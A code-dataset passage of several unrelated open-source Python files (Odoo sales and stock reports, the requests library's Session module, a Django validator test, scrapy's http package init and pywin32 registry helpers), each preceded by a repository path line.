SaleOrderLine = self.pool['sale.order.line']
return {
product_id: SaleOrderLine.search_count(cr,uid, [('product_id', '=', product_id)], context=context)
for product_id in ids
}
_columns = {
'sales_count': fields.function(_sales_count, string='# Sales', type='integer'),
}
class product_template(osv.Model):
_inherit = 'product.template'
def _sales_count(self, cr, uid, ids, field_name, arg, context=None):
res = dict.fromkeys(ids, 0)
for template in self.browse(cr, uid, ids, context=context):
res[template.id] = sum([p.sales_count for p in template.product_variant_ids])
return res
def action_view_sales(self, cr, uid, ids, context=None):
act_obj = self.pool.get('ir.actions.act_window')
mod_obj = self.pool.get('ir.model.data')
product_ids = []
for template in self.browse(cr, uid, ids, context=context):
product_ids += [x.id for x in template.product_variant_ids]
result = mod_obj.xmlid_to_res_id(cr, uid, 'sale.action_order_line_product_tree',raise_if_not_found=True)
result = act_obj.read(cr, uid, [result], context=context)[0]
result['domain'] = "[('product_id','in',[" + ','.join(map(str, product_ids)) + "])]"
return result
_columns = {
'sales_count': fields.function(_sales_count, string='# Sales', type='integer'),
}
|
zchking/odoo | refs/heads/8.0 | addons/stock/report/report_stock.py | 376 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.sql import drop_view_if_exists
class report_stock_lines_date(osv.osv):
_name = "report.stock.lines.date"
_description = "Dates of Inventories and latest Moves"
_auto = False
_order = "date"
_columns = {
'id': fields.integer('Product Id', readonly=True),
'product_id': fields.many2one('product.product', 'Product', readonly=True, select=True),
'date': fields.datetime('Date of latest Inventory', readonly=True),
'move_date': fields.datetime('Date of latest Stock Move', readonly=True),
"active": fields.boolean("Active", readonly=True),
}
def init(self, cr):
drop_view_if_exists(cr, 'report_stock_lines_date')
cr.execute("""
create or replace view report_stock_lines_date as (
select
p.id as id,
p.id as product_id,
max(s.date) as date,
max(m.date) as move_date,
p.active as active
from
product_product p
left join (
stock_inventory_line l
inner join stock_inventory s on (l.inventory_id=s.id and s.state = 'done')
) on (p.id=l.product_id)
left join stock_move m on (m.product_id=p.id and m.state = 'done')
group by p.id
)""")
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
YouRik/Received | refs/heads/master | qml/components/python/requests/sessions.py | 439 | # -*- coding: utf-8 -*-
"""
requests.session
~~~~~~~~~~~~~~~~
This module provides a Session object to manage and persist settings across
requests (cookies, auth, proxies).
"""
import os
from collections import Mapping
from datetime import datetime
from .auth import _basic_auth_str
from .compat import cookielib, OrderedDict, urljoin, urlparse
from .cookies import (
cookiejar_from_dict, extract_cookies_to_jar, RequestsCookieJar, merge_cookies)
from .models import Request, PreparedRequest, DEFAULT_REDIRECT_LIMIT
from .hooks import default_hooks, dispatch_hook
from .utils import to_key_val_list, default_headers, to_native_string
from .exceptions import (
TooManyRedirects, InvalidSchema, ChunkedEncodingError, ContentDecodingError)
from .packages.urllib3._collections import RecentlyUsedContainer
from .structures import CaseInsensitiveDict
from .adapters import HTTPAdapter
from .utils import (
requote_uri, get_environ_proxies, get_netrc_auth, should_bypass_proxies,
get_auth_from_url
)
from .status_codes import codes
# formerly defined here, reexposed here for backward compatibility
from .models import REDIRECT_STATI
REDIRECT_CACHE_SIZE = 1000
def merge_setting(request_setting, session_setting, dict_class=OrderedDict):
"""
Determines appropriate setting for a given request, taking into account the
explicit setting on that request, and the setting in the session. If a
setting is a dictionary, they will be merged together using `dict_class`
"""
if session_setting is None:
return request_setting
if request_setting is None:
return session_setting
# Bypass if not a dictionary (e.g. verify)
if not (
isinstance(session_setting, Mapping) and
isinstance(request_setting, Mapping)
):
return request_setting
merged_setting = dict_class(to_key_val_list(session_setting))
merged_setting.update(to_key_val_list(request_setting))
# Remove keys that are set to None.
for (k, v) in request_setting.items():
if v is None:
del merged_setting[k]
merged_setting = dict((k, v) for (k, v) in merged_setting.items() if v is not None)
return merged_setting
def merge_hooks(request_hooks, session_hooks, dict_class=OrderedDict):
"""
Properly merges both requests and session hooks.
This is necessary because when request_hooks == {'response': []}, the
merge breaks Session hooks entirely.
"""
if session_hooks is None or session_hooks.get('response') == []:
return request_hooks
if request_hooks is None or request_hooks.get('response') == []:
return session_hooks
return merge_setting(request_hooks, session_hooks, dict_class)
class SessionRedirectMixin(object):
def resolve_redirects(self, resp, req, stream=False, timeout=None,
verify=True, cert=None, proxies=None, **adapter_kwargs):
"""Receives a Response. Returns a generator of Responses."""
i = 0
hist = [] # keep track of history
while resp.is_redirect:
prepared_request = req.copy()
if i > 0:
# Update history and keep track of redirects.
hist.append(resp)
new_hist = list(hist)
resp.history = new_hist
try:
resp.content # Consume socket so it can be released
except (ChunkedEncodingError, ContentDecodingError, RuntimeError):
resp.raw.read(decode_content=False)
if i >= self.max_redirects:
raise TooManyRedirects('Exceeded %s redirects.' % self.max_redirects)
# Release the connection back into the pool.
resp.close()
url = resp.headers['location']
method = req.method
# Handle redirection without scheme (see: RFC 1808 Section 4)
if url.startswith('//'):
parsed_rurl = urlparse(resp.url)
url = '%s:%s' % (parsed_rurl.scheme, url)
# The scheme should be lower case...
parsed = urlparse(url)
url = parsed.geturl()
# Facilitate relative 'location' headers, as allowed by RFC 7231.
# (e.g. '/path/to/resource' instead of 'http://domain.tld/path/to/resource')
# Compliant with RFC3986, we percent encode the url.
if not parsed.netloc:
url = urljoin(resp.url, requote_uri(url))
else:
url = requote_uri(url)
prepared_request.url = to_native_string(url)
# Cache the url, unless it redirects to itself.
if resp.is_permanent_redirect and req.url != prepared_request.url:
self.redirect_cache[req.url] = prepared_request.url
# http://tools.ietf.org/html/rfc7231#section-6.4.4
if (resp.status_code == codes.see_other and
method != 'HEAD'):
method = 'GET'
# Do what the browsers do, despite standards...
# First, turn 302s into GETs.
if resp.status_code == codes.found and method != 'HEAD':
method = 'GET'
# Second, if a POST is responded to with a 301, turn it into a GET.
# This bizarre behaviour is explained in Issue 1704.
if resp.status_code == codes.moved and method == 'POST':
method = 'GET'
prepared_request.method = method
# https://github.com/kennethreitz/requests/issues/1084
if resp.status_code not in (codes.temporary_redirect, codes.permanent_redirect):
if 'Content-Length' in prepared_request.headers:
del prepared_request.headers['Content-Length']
prepared_request.body = None
headers = prepared_request.headers
try:
del headers['Cookie']
except KeyError:
pass
# Extract any cookies sent on the response to the cookiejar
# in the new request. Because we've mutated our copied prepared
# request, use the old one that we haven't yet touched.
extract_cookies_to_jar(prepared_request._cookies, req, resp.raw)
prepared_request._cookies.update(self.cookies)
prepared_request.prepare_cookies(prepared_request._cookies)
# Rebuild auth and proxy information.
proxies = self.rebuild_proxies(prepared_request, proxies)
self.rebuild_auth(prepared_request, resp)
# Override the original request.
req = prepared_request
resp = self.send(
req,
stream=stream,
timeout=timeout,
verify=verify,
cert=cert,
proxies=proxies,
allow_redirects=False,
**adapter_kwargs
)
extract_cookies_to_jar(self.cookies, prepared_request, resp.raw)
i += 1
yield resp
def rebuild_auth(self, prepared_request, response):
"""
When being redirected we may want to strip authentication from the
request to avoid leaking credentials. This method intelligently removes
and reapplies authentication where possible to avoid credential loss.
"""
headers = prepared_request.headers
url = prepared_request.url
if 'Authorization' in headers:
# If we get redirected to a new host, we should strip out any
# authentication headers.
original_parsed = urlparse(response.request.url)
redirect_parsed = urlparse(url)
if (original_parsed.hostname != redirect_parsed.hostname):
del headers['Authorization']
# .netrc might have more auth for us on our new host.
new_auth = get_netrc_auth(url) if self.trust_env else None
if new_auth is not None:
prepared_request.prepare_auth(new_auth)
return
def rebuild_proxies(self, prepared_request, proxies):
"""
This method re-evaluates the proxy configuration by considering the
environment variables. If we are redirected to a URL covered by
NO_PROXY, we strip the proxy configuration. Otherwise, we set missing
proxy keys for this URL (in case they were stripped by a previous
redirect).
This method also replaces the Proxy-Authorization header where
necessary.
"""
headers = prepared_request.headers
url = prepared_request.url
scheme = urlparse(url).scheme
new_proxies = proxies.copy() if proxies is not None else {}
if self.trust_env and not should_bypass_proxies(url):
environ_proxies = get_environ_proxies(url)
proxy = environ_proxies.get(scheme)
if proxy:
new_proxies.setdefault(scheme, environ_proxies[scheme])
if 'Proxy-Authorization' in headers:
del headers['Proxy-Authorization']
try:
username, password = get_auth_from_url(new_proxies[scheme])
except KeyError:
username, password = None, None
if username and password:
headers['Proxy-Authorization'] = _basic_auth_str(username, password)
return new_proxies
class Session(SessionRedirectMixin):
"""A Requests session.
Provides cookie persistence, connection-pooling, and configuration.
Basic Usage::
>>> import requests
>>> s = requests.Session()
>>> s.get('http://httpbin.org/get')
200
"""
__attrs__ = [
'headers', 'cookies', 'auth', 'proxies', 'hooks', 'params', 'verify',
'cert', 'prefetch', 'adapters', 'stream', 'trust_env',
'max_redirects',
]
def __init__(self):
#: A case-insensitive dictionary of headers to be sent on each
#: :class:`Request <Request>` sent from this
#: :class:`Session <Session>`.
self.headers = default_headers()
#: Default Authentication tuple or object to attach to
#: :class:`Request <Request>`.
self.auth = None
#: Dictionary mapping protocol to the URL of the proxy (e.g.
#: {'http': 'foo.bar:3128'}) to be used on each
#: :class:`Request <Request>`.
self.proxies = {}
#: Event-handling hooks.
self.hooks = default_hooks()
#: Dictionary of querystring data to attach to each
#: :class:`Request <Request>`. The dictionary values may be lists for
#: representing multivalued query parameters.
self.params = {}
#: Stream response content default.
self.stream = False
#: SSL Verification default.
self.verify = True
#: SSL certificate default.
self.cert = None
#: Maximum number of redirects allowed. If the request exceeds this
#: limit, a :class:`TooManyRedirects` exception is raised.
self.max_redirects = DEFAULT_REDIRECT_LIMIT
#: Should we trust the environment?
self.trust_env = True
#: A CookieJar containing all currently outstanding cookies set on this
#: session. By default it is a
#: :class:`RequestsCookieJar <requests.cookies.RequestsCookieJar>`, but
#: may be any other ``cookielib.CookieJar`` compatible object.
self.cookies = cookiejar_from_dict({})
# Default connection adapters.
self.adapters = OrderedDict()
self.mount('https://', HTTPAdapter())
self.mount('http://', HTTPAdapter())
# Only store 1000 redirects to prevent using infinite memory
self.redirect_cache = RecentlyUsedContainer(REDIRECT_CACHE_SIZE)
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def prepare_request(self, request):
"""Constructs a :class:`PreparedRequest <PreparedRequest>` for
transmission and returns it. The :class:`PreparedRequest` has settings
merged from the :class:`Request <Request>` instance and those of the
:class:`Session`.
:param request: :class:`Request` instance to prepare with this
session's settings.
"""
cookies = request.cookies or {}
# Bootstrap CookieJar.
if not isinstance(cookies, cookielib.CookieJar):
cookies = cookiejar_from_dict(cookies)
# Merge with session cookies
merged_cookies = merge_cookies(
merge_cookies(RequestsCookieJar(), self.cookies), cookies)
# Set environment's basic authentication if not explicitly set.
auth = request.auth
if self.trust_env and not auth and not self.auth:
auth = get_netrc_auth(request.url)
p = PreparedRequest()
p.prepare(
method=request.method.upper(),
url=request.url,
files=request.files,
data=request.data,
json=request.json,
headers=merge_setting(request.headers, self.headers, dict_class=CaseInsensitiveDict),
params=merge_setting(request.params, self.params),
auth=merge_setting(auth, self.auth),
cookies=merged_cookies,
hooks=merge_hooks(request.hooks, self.hooks),
)
return p
def request(self, method, url,
params=None,
data=None,
headers=None,
cookies=None,
files=None,
auth=None,
timeout=None,
allow_redirects=True,
proxies=None,
hooks=None,
stream=None,
verify=None,
cert=None,
json=None):
"""Constructs a :class:`Request <Request>`, prepares it and sends it.
Returns :class:`Response <Response>` object.
:param method: method for the new :class:`Request` object.
:param url: URL for the new :class:`Request` object.
:param params: (optional) Dictionary or bytes to be sent in the query
string for the :class:`Request`.
:param data: (optional) Dictionary or bytes to send in the body of the
:class:`Request`.
:param json: (optional) json to send in the body of the
:class:`Request`.
:param headers: (optional) Dictionary of HTTP Headers to send with the
:class:`Request`.
:param cookies: (optional) Dict or CookieJar object to send with the
:class:`Request`.
:param files: (optional) Dictionary of ``'filename': file-like-objects``
for multipart encoding upload.
:param auth: (optional) Auth tuple or callable to enable
Basic/Digest/Custom HTTP Auth.
:param timeout: (optional) How long to wait for the server to send
data before giving up, as a float, or a (`connect timeout, read
timeout <user/advanced.html#timeouts>`_) tuple.
:type timeout: float or tuple
:param allow_redirects: (optional) Set to True by default.
:type allow_redirects: bool
:param proxies: (optional) Dictionary mapping protocol to the URL of
the proxy.
:param stream: (optional) whether to immediately download the response
content. Defaults to ``False``.
:param verify: (optional) if ``True``, the SSL cert will be verified.
A CA_BUNDLE path can also be provided.
:param cert: (optional) if String, path to ssl client cert file (.pem).
If Tuple, ('cert', 'key') pair.
"""
method = to_native_string(method)
# Create the Request.
req = Request(
method = method.upper(),
url = url,
headers = headers,
files = files,
data = data or {},
json = json,
params = params or {},
auth = auth,
cookies = cookies,
hooks = hooks,
)
prep = self.prepare_request(req)
proxies = proxies or {}
settings = self.merge_environment_settings(
prep.url, proxies, stream, verify, cert
)
# Send the request.
send_kwargs = {
'timeout': timeout,
'allow_redirects': allow_redirects,
}
send_kwargs.update(settings)
resp = self.send(prep, **send_kwargs)
return resp
def get(self, url, **kwargs):
"""Sends a GET request. Returns :class:`Response` object.
:param url: URL for the new :class:`Request` object.
:param \*\*kwargs: Optional arguments that ``request`` takes.
"""
kwargs.setdefault('allow_redirects', True)
return self.request('GET', url, **kwargs)
def options(self, url, **kwargs):
"""Sends a OPTIONS request. Returns :class:`Response` object.
:param url: URL for the new :class:`Request` object.
:param \*\*kwargs: Optional arguments that ``request`` takes.
"""
kwargs.setdefault('allow_redirects', True)
return self.request('OPTIONS', url, **kwargs)
def head(self, url, **kwargs):
"""Sends a HEAD request. Returns :class:`Response` object.
:param url: URL for the new :class:`Request` object.
:param \*\*kwargs: Optional arguments that ``request`` takes.
"""
kwargs.setdefault('allow_redirects', False)
return self.request('HEAD', url, **kwargs)
def post(self, url, data=None, json=None, **kwargs):
"""Sends a POST request. Returns :class:`Response` object.
:param url: URL for the new :class:`Request` object.
:param data: (optional) Dictionary, bytes, or file-like object to send in the body of the :class:`Request`.
:param json: (optional) json to send in the body of the :class:`Request`.
:param \*\*kwargs: Optional arguments that ``request`` takes.
"""
return self.request('POST', url, data=data, json=json, **kwargs)
def put(self, url, data=None, **kwargs):
"""Sends a PUT request. Returns :class:`Response` object.
:param url: URL for the new :class:`Request` object.
:param data: (optional) Dictionary, bytes, or file-like object to send in the body of the :class:`Request`.
:param \*\*kwargs: Optional arguments that ``request`` takes.
"""
return self.request('PUT', url, data=data, **kwargs)
def patch(self, url, data=None, **kwargs):
"""Sends a PATCH request. Returns :class:`Response` object.
:param url: URL for the new :class:`Request` object.
:param data: (optional) Dictionary, bytes, or file-like object to send in the body of the :class:`Request`.
:param \*\*kwargs: Optional arguments that ``request`` takes.
"""
return self.request('PATCH', url, data=data, **kwargs)
def delete(self, url, **kwargs):
"""Sends a DELETE request. Returns :class:`Response` object.
:param url: URL for the new :class:`Request` object.
:param \*\*kwargs: Optional arguments that ``request`` takes.
"""
return self.request('DELETE', url, **kwargs)
def send(self, request, **kwargs):
"""Send a given PreparedRequest."""
# Set defaults that the hooks can utilize to ensure they always have
# the correct parameters to reproduce the previous request.
kwargs.setdefault('stream', self.stream)
kwargs.setdefault('verify', self.verify)
kwargs.setdefault('cert', self.cert)
kwargs.setdefault('proxies', self.proxies)
# It's possible that users might accidentally send a Request object.
# Guard against that specific failure case.
if not isinstance(request, PreparedRequest):
raise ValueError('You can only send PreparedRequests.')
checked_urls = set()
while request.url in self.redirect_cache:
checked_urls.add(request.url)
new_url = self.redirect_cache.get(request.url)
if new_url in checked_urls:
break
request.url = new_url
# Set up variables needed for resolve_redirects and dispatching of hooks
allow_redirects = kwargs.pop('allow_redirects', True)
stream = kwargs.get('stream')
hooks = request.hooks
# Get the appropriate adapter to use
adapter = self.get_adapter(url=request.url)
# Start time (approximately) of the request
start = datetime.utcnow()
# Send the request
r = adapter.send(request, **kwargs)
# Total elapsed time of the request (approximately)
r.elapsed = datetime.utcnow() - start
# Response manipulation hooks
r = dispatch_hook('response', hooks, r, **kwargs)
# Persist cookies
if r.history:
# If the hooks create history then we want those cookies too
for resp in r.history:
extract_cookies_to_jar(self.cookies, resp.request, resp.raw)
extract_cookies_to_jar(self.cookies, request, r.raw)
# Redirect resolving generator.
gen = self.resolve_redirects(r, request, **kwargs)
# Resolve redirects if allowed.
history = [resp for resp in gen] if allow_redirects else []
# Shuffle things around if there's history.
if history:
# Insert the first (original) request at the start
history.insert(0, r)
# Get the last request made
r = history.pop()
r.history = history
if not stream:
r.content
return r
def merge_environment_settings(self, url, proxies, stream, verify, cert):
"""Check the environment and merge it with some settings."""
# Gather clues from the surrounding environment.
if self.trust_env:
# Set environment's proxies.
env_proxies = get_environ_proxies(url) or {}
for (k, v) in env_proxies.items():
proxies.setdefault(k, v)
# Look for requests environment configuration and be compatible
# with cURL.
if verify is True or verify is None:
verify = (os.environ.get('REQUESTS_CA_BUNDLE') or
os.environ.get('CURL_CA_BUNDLE'))
# Merge all the kwargs.
proxies = merge_setting(proxies, self.proxies)
stream = merge_setting(stream, self.stream)
verify = merge_setting(verify, self.verify)
cert = merge_setting(cert, self.cert)
return {'verify': verify, 'proxies': proxies, 'stream': stream,
'cert': cert}
def get_adapter(self, url):
"""Returns the appropriate connnection adapter for the given URL."""
for (prefix, adapter) in self.adapters.items():
if url.lower().startswith(prefix):
return adapter
# Nothing matches :-/
raise InvalidSchema("No connection adapters were found for '%s'" % url)
def close(self):
"""Closes all adapters and as such the session"""
for v in self.adapters.values():
v.close()
def mount(self, prefix, adapter):
"""Registers a connection adapter to a prefix.
Adapters are sorted in descending order by key length."""
self.adapters[prefix] = adapter
keys_to_move = [k for k in self.adapters if len(k) < len(prefix)]
for key in keys_to_move:
self.adapters[key] = self.adapters.pop(key)
def __getstate__(self):
state = dict((attr, getattr(self, attr, None)) for attr in self.__attrs__)
state['redirect_cache'] = dict(self.redirect_cache)
return state
def __setstate__(self, state):
redirect_cache = state.pop('redirect_cache', {})
for attr, value in state.items():
setattr(self, attr, value)
self.redirect_cache = RecentlyUsedContainer(REDIRECT_CACHE_SIZE)
for redirect, to in redirect_cache.items():
self.redirect_cache[redirect] = to
def session():
"""Returns a :class:`Session` for context-management."""
return Session()
|
rahul67/hue | refs/heads/master | desktop/core/ext-py/Django-1.6.10/tests/validation/test_validators.py | 118 | from __future__ import absolute_import, unicode_literals
from . import ValidationTestCase
from .models import ModelToValidate
class TestModelsWithValidators(ValidationTestCase):
def test_custom_validator_passes_for_correct_value(self):
mtv = ModelToValidate(number=10, name='Some Name', f_with_custom_validator=42)
self.assertEqual(None, mtv.full_clean())
def test_custom_validator_raises_error_for_incorrect_value(self):
mtv = ModelToValidate(number=10, name='Some Name', f_with_custom_validator=12)
self.assertFailsValidation(mtv.full_clean, ['f_with_custom_validator'])
self.assertFieldFailsValidationWithMessage(
mtv.full_clean,
'f_with_custom_validator',
['This is not the answer to life, universe and everything!']
)
|
liyy7/scrapy | refs/heads/master | scrapy/http/__init__.py | 207 | """
Module containing all HTTP related classes
Use this module (instead of the more specific ones) when importing Headers,
Request and Response outside this module.
"""
from scrapy.http.headers import Headers
from scrapy.http.request import Request
from scrapy.http.request.form import FormRequest
from scrapy.http.request.rpc import XmlRpcRequest
from scrapy.http.response import Response
from scrapy.http.response.html import HtmlResponse
from scrapy.http.response.xml import XmlResponse
from scrapy.http.response.text import TextResponse
|
alanjw/GreenOpenERP-Win-X86 | refs/heads/7.0 | python/Lib/site-packages/win32/lib/regutil.py | 5 | # Some registry helpers.
import win32api
import win32con
import sys
import os
error = "Registry utility error"
# A .py file has a CLSID associated with it (why? - dunno!)
CLSIDPyFile = "{b51df050-06ae-11cf-ad3b-524153480001}"
RegistryIDPyFile = "Python.File" # The registry "file type" of a .py file
RegistryIDPycFile = "Python.CompiledFile" # The registry "file type" of a .pyc file
def BuildDefaultPythonKey():
"""Builds a string containing the path to the current registry key.
The Python registry key contains the Python version. This function
uses the version of the DLL used by the current process to get the
registry key currently in use.
"""
return "Software\\Python\\PythonCore\\" + sys.winver
def GetRootKey():
"""Retrieves the Registry root in use by Python.
"""
keyname = BuildDefaultPythonKey()
try:
k = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyname)
k.close()
return win32con.HKEY_CURRENT_USER
except win32api.error:
return win32con.HKEY_LOCAL_MACHINE
def GetRegistryDefaultValue(subkey, rootkey = None):
"""A helper to return the default value for a key in the registry.
"""
if rootkey is None: rootkey = GetRootKey()
return win32api.RegQueryValue(rootkey, subkey)
def SetRegistryDefaultValue(subKey, value, rootkey = None):
"""A helper to set the default value for a key in the registry
"""
if rootkey is None: rootkey = GetRootKey()
if type(value)==str:
typeId = win32con.REG_SZ
elif type(value)==int:
typeId = win32con.REG_DWORD
else:
raise TypeError("Value must be string or integer - was passed " + repr(value))
win32api.RegSetValue(rootkey, subKey, typeId ,value)
def GetAppPathsKey():
return "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths"
def RegisterPythonExe(exeFullPath, exeAlias = None, exeAppPath = None):
"""Register a .exe file that uses Python.
Registers the .exe with the OS. This allows the specified .exe to
be run from the command-line or start button without using the full path,
and also to setup application specific path (ie, os.environ['PATH']).
Currently the exeAppPath is not supported, so this function is general
purpose, and not specific to Python at all. Later, exeAppPath may provide
a reasonable default that is used.
exeFullPath -- The full path to the .exe
exeAlias = None -- An alias for the exe - if none, the base portion
of the filename is used.
exeAppPath -- Not supported.
"""
# Note - Dont work on win32s (but we dont care anymore!)
if exeAppPath:
raise error("Do not support exeAppPath argument currently")
if exeAlias is None:
exeAlias = os.path.basename(exeFullPath)
win32api.RegSetValue(GetRootKey(), GetAppPathsKey() + "\\" + exeAlias, win32con.REG_SZ, exeFullPath)
def GetRegisteredExe(exeAlias):
"""Get a registered .exe
"""
return win32api.RegQueryValue(GetRootKey(), GetAppPathsKey() + "\\" + exeAlias)
def UnregisterPythonExe(exeAlias):
"""Unregister a .exe file that uses Python.
"""
try:
win32api.RegDeleteKey(GetRootKey(), GetAppPathsKey() + "\\" + exeAlias)
except win32api.error, exc:
import winerror
if exc.winerror!=winerror.ERROR_FILE_NOT_FOUND:
raise
return
def RegisterNamedPath(name, path):
"""Register a named path - ie, a named PythonPath entry.
"""
keyStr = BuildDefaultPythonKey() + "\\PythonPath"
if name: keyStr = keyStr + "\\" + name
win32api.RegSetValue(GetRootKey(), keyStr, win32con.REG_SZ, path)
def UnregisterNamedPath(name):
"""Unregister a named path - ie, a named PythonPath entry.
"""
keyStr = BuildDefaultPythonKey() + "\\PythonPath\\" + name
try:
win32api.RegDeleteKey(GetRootKey(), keyStr)
except win32api.error, exc:
import winerror
if exc.winerror!=winerror.ERROR_FILE_NOT_FOUND:
raise
return
def GetRegisteredNamedPath(name):
"""Get a registered named path, or None if it doesnt exist.
"""
keyStr = BuildDefaultPythonKey() + "\\PythonPath"
if name: keyStr = keyStr + "\\" + name
try:
return win32api.RegQueryValue(GetRootKey(), keyStr)
except win32api.error, exc:
import winerror
if exc.winerror!=winerror.ERROR_FILE_NOT_FOUND:
raise
return None
def RegisterModule(modName, modPath):
"""Register an explicit module in the registry. This forces the Python import
mechanism to locate this module directly, without a sys.path search. Thus
a registered module need not appear in sys.path at all.
modName -- The name of the module, as used by import.
modPath -- The full path and file name of the module.
"""
try:
import os
os.stat(modPath)
except os.error:
print "Warning: Registering non-existant module %s" % modPath
win32api.RegSetValue(GetRootKey(),
BuildDefaultPythonKey() + "\\Modules\\%s" % modName,
win32con.REG_SZ, modPath)
def UnregisterModule(modName):
"""Unregister an explicit module in the registry.
modName -- The name of the module, as used by import.
"""
try:
win32api.RegDeleteKey(GetRootKey(),
BuildDefaultPythonKey() + "\\Modules\\%s" % modName)
except win32api.error, exc:
import winerror
if exc.winerror!=winerror.ERROR_FILE_NOT_FOUND:
raise
def GetRegisteredHelpFile(helpDesc):
"""Given a description, return the registered entry.
"""
try:
return GetRegistryDefaultValue(BuildDefaultPythonKey() + "\\Help\\" + helpDesc)
except win32api.error:
try:
return GetRegistryDefaultValue(BuildDefaultPythonKey() + "\\Help\\" + helpDesc, win32con.HKEY_CURRENT_USER)
except win32api.error:
pass
return None
def RegisterHelpFile(helpFile, helpPath, helpDesc = None, bCheckFile = 1):
"""Register a help file in the registry.
Note that this used to support writing to the Windows Help
key, however this is no longer done, as it seems to be incompatible.
helpFile -- the base name of the help file.
helpPath -- the path to the help file
helpDesc -- A description for the help file. If None, the helpFile param is used.
bCheckFile -- A flag indicating if the file existence should be checked.
"""
if helpDesc is None: helpDesc = helpFile
fullHelpFile = os.path.join(helpPath, helpFile)
try:
if bCheckFile: os.stat(fullHelpFile)
except os.error:
raise ValueError("Help file does not exist")
# Now register with Python itself.
win32api.RegSetValue(GetRootKey(),
BuildDefaultPythonKey() + "\\Help\\%s" % helpDesc, win32con.REG_SZ, fullHelpFile)
def UnregisterHelpFile(helpFile, helpDesc = None):
"""Unregister a help file in the registry.
helpFile -- the base name of the help file.
helpDesc -- A description for the help file. If None, the helpFile param is used.
"""
key = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\Help", 0, win32con.KEY_ALL_ACCESS)
try:
try:
win32api.RegDeleteValue(key, helpFile)
except win32api.error, exc:
import winerror
if exc.winerror!=winerror.ERROR_FILE_NOT_FOUND:
raise
finally:
win32api.RegCloseKey(key)
# Now de-register with Python itself.
if helpDesc is None: helpDesc = helpFile
try:
win32api.RegDeleteKey(GetRootKey(),
BuildDefaultPythonKey() + "\\Help\\%s" % helpDesc)
except win32api.error, exc:
import winerror
if exc.winerror!=winerror.ERROR_FILE_NOT_FOUND:
raise
def RegisterCoreDLL(coredllName = None):
"""Registers the core DLL in the registry.
If no params are passed, the name of the Python DLL used in
the current process is used and registered.
"""
if coredllName is None:
coredllName = win32api.GetModuleFileName(sys.dllhandle)
# must exist!
else:
try:
os.stat(coredllName)
except os.error:
print "Warning: Registering non-existant core DLL %s" % coredllName
hKey = win32api.RegCreateKey(GetRootKey() , BuildDefaultPythonKey())
try:
win32api.RegSetValue(hKey, "Dll", win32con.REG_SZ, coredllName)
finally:
win32api.RegCloseKey(hKey)
# Lastly, setup the current version to point to me.
win32api.RegSetValue(GetRootKey(), "Software\\Python\\PythonCore\\CurrentVersion", win32con.REG_SZ, sys.winver)
def RegisterFileExtensions(defPyIcon, defPycIcon, runCommand):
"""Register the core Python file extensions.
defPyIcon -- The default icon to use for .py files, in 'fname,offset' format.
defPycIcon -- The default icon to use for .pyc files, in 'fname,offset' format.
runCommand -- The command line to use for running .py files
"""
# Register the file extensions.
pythonFileId = RegistryIDPyFile
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , ".py", win32con.REG_SZ, pythonFileId)
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , pythonFileId , win32con.REG_SZ, "Python File")
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , "%s\\CLSID" % pythonFileId , win32con.REG_SZ, CLSIDPyFile)
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , "%s\\DefaultIcon" % pythonFileId, win32con.REG_SZ, defPyIcon)
base = "%s\\Shell" % RegistryIDPyFile
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , base + "\\Open", win32con.REG_SZ, "Run")
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , base + "\\Open\\Command", win32con.REG_SZ, runCommand)
# Register the .PYC.
pythonFileId = RegistryIDPycFile
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , ".pyc", win32con.REG_SZ, pythonFileId)
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , pythonFileId , win32con.REG_SZ, "Compiled Python File")
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , "%s\\DefaultIcon" % pythonFileId, win32con.REG_SZ, defPycIcon)
base = "%s\\Shell" % pythonFileId
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , base + "\\Open", win32con.REG_SZ, "Run")
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , base + "\\Open\\Command", win32con.REG_SZ, runCommand)
def RegisterShellCommand(shellCommand, exeCommand, shellUserCommand = None):
# Last param for "Open" - for a .py file to be executed by the command line
# or shell execute (eg, just entering "foo.py"), the Command must be "Open",
# but you may associate a different name for the right-click menu.
# In our case, normally we have "Open=Run"
base = "%s\\Shell" % RegistryIDPyFile
if shellUserCommand:
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , base + "\\%s" % (shellCommand), win32con.REG_SZ, shellUserCommand)
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , base + "\\%s\\Command" % (shellCommand), win32con.REG_SZ, exeCommand)
def RegisterDDECommand(shellCommand, ddeApp, ddeTopic, ddeCommand):
base = "%s\\Shell" % RegistryIDPyFile
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , base + "\\%s\\ddeexec" % (shellCommand), win32con.REG_SZ, ddeCommand)
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , base + "\\%s\\ddeexec\\Application" % (shellCommand), win32con.REG_SZ, ddeApp)
win32api.RegSetValue(win32con.HKEY_CLASSES_ROOT , base + "\\%s\\ddeexec\\Topic" % (shellCommand), win32con.REG_SZ, ddeTopic)
|
barma1309/Kalista | refs/heads/master | .virtualenvs/Kalista/lib/python3.4/site-packages/django/contrib/webdesign/__init__.py | 264 | import warnings
